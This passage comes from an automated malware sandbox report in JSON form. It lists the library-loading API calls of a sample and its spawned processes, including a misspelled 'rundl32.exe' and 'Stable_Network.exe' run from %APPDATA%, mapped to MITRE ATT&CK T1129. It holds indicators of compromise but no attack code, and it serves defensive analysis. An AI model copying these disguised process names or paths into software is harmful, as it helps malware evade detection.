\"140015003c70a66a@ADVAPI32.dll\"\n \"140015005470a66a@ADVAPI32.dll\"\n \"0c000d009c70a66a@ADVAPI32.dll\"\n \"0c000d00ac70a66a@ADVAPI32.dll\"\n \"0e000f00bc70a66a@ADVAPI32.dll\"\n \"0e000f00cc70a66a@ADVAPI32.dll\"\n \"0b000c00dc70a66a@ADVAPI32.dll\"\n \"180019001473a66a@RPCRT4.dll\"\n \"130014004073a66a@RPCRT4.dll\"\n \"140015005473a66a@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-0.dll (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"LoadLibrary\" with a parameter VERSION.dll (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"LoadLibrary\" with a parameter mscoree.dll (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"LoadLibrary\" with a parameter ntdll (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v2.0.50727_32\\mscorlib\\9f895c66454577eff9c77442d0c84f71\\mscorlib.ni.dll (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\ole32.dll (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"LoadLibrary\" with a parameter AdvApi32.dll (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\mscorjit.dll (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v2.0.50727_32\\System\\ad92dab7f418877d6a1e0358ce35658a\\System.ni.dll (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\bcrypt.dll (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"LoadLibrary\" with a parameter bcrypt.dll (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\shell32.dll (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"LoadLibrary\" with a parameter shfolder.dll (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\VERSION.dll (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"LoadLibrary\" with a parameter C:\\8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\culture.dll (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\en-US\\mscorrc.dll (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\en\\mscorrc.dll (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\mscorrc.dll (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\diasymreader.dll (UID: 00000000-00006040)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-2.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-0.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter VERSION.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-quirks-l1-1-0.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter mscoree.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\combase.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter psapi.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-xstate-l2-1-0.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.V9921e851#\\a891970b44db9e340c3ef3efa95b793c\\Microsoft.VisualBasic.ni.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter bcrypt.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\psapi.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\96f7edb07b12303f0ec2595c7f3778c7\\System.Configuration.ni.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\15af16d373cf0528cb74fc73d365fdbf\\System.Xml.ni.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\rasapi32.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter rasapi32.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\ws2_32.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter ws2_32.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter RASMAN.DLL (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter rtutils.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-winsvc-L1-1-0.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L1-1-0.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\winhttp.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter winhttp.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter RPCRT4.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter IPHLPAPI.DLL (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter NSI.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter CFGMGR32.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L2-1-0.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\en-US\\tzres.dll.mui (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter user32.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\iphlpapi.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter iphlpapi.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\secur32.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter secur32.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter ncrypt.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\bcryptprimitives.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\crypt32.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter crypt32.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\CRYPT32.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter CRYPT32.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter USERENV.dll (UID: 00000000-00006060)\n \"rundl32.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00006060)\n \"Stable_Network.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"LoadLibrary\" with a parameter %APPDATA%\\Stable_Network.exe (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"LoadLibrary\" with a parameter UxTheme.dll (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"LoadLibrary\" with a parameter IMM32.dll (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"LoadLibrary\" with a parameter comctl32 (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\advapi32.dll (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"LoadLibrary\" with a parameter winhttp.dll (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"LoadLibrary\" with a parameter RPCRT4.dll (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"LoadLibrary\" with a parameter wshtcpip (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"LoadLibrary\" with a parameter wship6.dll (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"LoadLibrary\" with a parameter DNSAPI.dll (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"LoadLibrary\" with a parameter secur32.dll (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"LoadLibrary\" with a parameter ncrypt.dll (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\bcryptprimitives.dll (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"LoadLibrary\" with a parameter CRYPT32.dll (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"LoadLibrary\" with a parameter USERENV.dll (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00006124)\n \"host.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00006136)\n \"host.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00006136)\n \"host.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006136)\n \"host.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006136)\n \"host.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006136)\n \"host.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006136)\n \"host.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00006136)\n \"host.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-2.dll (UID: 00000000-00006136)\n \"host.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-0.dll (UID: 00000000-00006136)\n \"host.exe\" called \"LoadLibrary\" with a parameter VERSION.dll (UID: 00000000-00006136)\n \"host.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll (UID: 00000000-00006136)\n \"host.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00006136)\n \"host.exe\" called \"LoadLibrary\" with a parameter mscoree.dll (UID: 00000000-00006136)\n \"host.exe\" called \"LoadLibrary\" with a parameter ntdll (UID: 00000000-00006136)\n \"host.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00006136)\n \"host.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00006136)\n \"host.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006136)\n \"host.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v2.0.50727_32\\mscorlib\\9f895c66454577eff9c77442d0c84f71\\mscorlib.ni.dll (UID: 00000000-00006136)\n \"host.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\ole32.dll (UID: 00000000-00006136)\n \"host.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00006136)\n \"host.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00006136)\n \"host.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00006136)\n \"host.exe\" called \"LoadLibrary\" with a parameter AdvApi32.dll (UID: 00000000-00006136)\n \"host.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\mscorjit.dll (UID: 00000000-00006136)\n \"host.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v2.0.50727_32\\System\\ad92dab7f418877d6a1e0358ce35658a\\System.ni.dll (UID: 00000000-00006136)\n \"host.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.VisualBas#\\6f5bf6427122bfc30b5be76bcd651018\\Microsoft.VisualBasic.ni.dll (UID: 00000000-00006136)\n \"host.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v2.0.50727_32\\System.Drawing\\ce3c98f2bf220ef17b0cf4233cac6ceb\\System.Drawing.ni.dll (UID: 00000000-00006136)\n \"host.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v2.0.50727_32\\System.Windows.Forms\\367e5b8a038ac76eba17528bb7b3688e\\System.Windows.Forms.ni.dll (UID: 00000000-00006136)\n \"host.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\shell32.dll (UID: 00000000-00006136)\n \"host.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00006136)\n \"host.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00006136)\n \"host.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00006136)\n \"host.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00006136)\n \"host.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00006136)\n \"host.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00006136)\n \"host.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00006136)\n \"host.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00006136)\n \"host.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00006136)\n \"host.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00006136)\n \"host.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00006136)\n \"dw20.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00004064)\n \"dw20.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004064)\n \"dw20.exe\" called \"LoadLibrary\" with a parameter SensApi.dll (UID: 00000000-00004064)\n \"GameSDK.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-2.dll (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-0.dll (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"LoadLibrary\" with a parameter VERSION.dll (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"LoadLibrary\" with a parameter mscoree.dll (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"LoadLibrary\" with a parameter ntdll (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"LoadLibrary\" with a parameter 